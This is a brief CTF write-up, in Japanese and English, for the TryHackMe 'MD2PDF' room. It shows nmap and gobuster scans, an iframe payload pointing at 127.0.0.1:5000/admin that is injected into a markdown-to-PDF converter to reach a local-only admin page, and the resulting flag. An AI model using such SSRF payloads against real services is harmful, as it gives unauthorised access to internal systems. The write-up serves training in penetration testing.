📑
[TryHackMe] MD2PDF-writeup
- Easy
nmap
┌─[user@parrot]─[~]
└──╼ $nmap -sV -T4 10.10.76.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 06:04 UTC
Warning: 10.10.76.123 giving up on port because retransmission cap hit (6).
WARNING: Service 10.10.76.123:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.10.76.123:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.76.123
Host is up (0.29s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open rtsp
5000/tcp open rtsp
15004/tcp filtered unknown
32772/tcp filtered sometimes-rpc7
なんかwarningでた
gobuster
┌─[user@parrot]─[~]
└──╼ $gobuster dir -u http://10.10.76.123 -w=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.76.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 403) [Size: 166]
admin/
local内でないので見れません
iframeで表示できるかもしれない?!
<iframe src="http://127.0.0.1:5000/admin"></iframe>
できました
flag{1f4a2b6ffeaf4707c43885d704eaee4b}
Discussion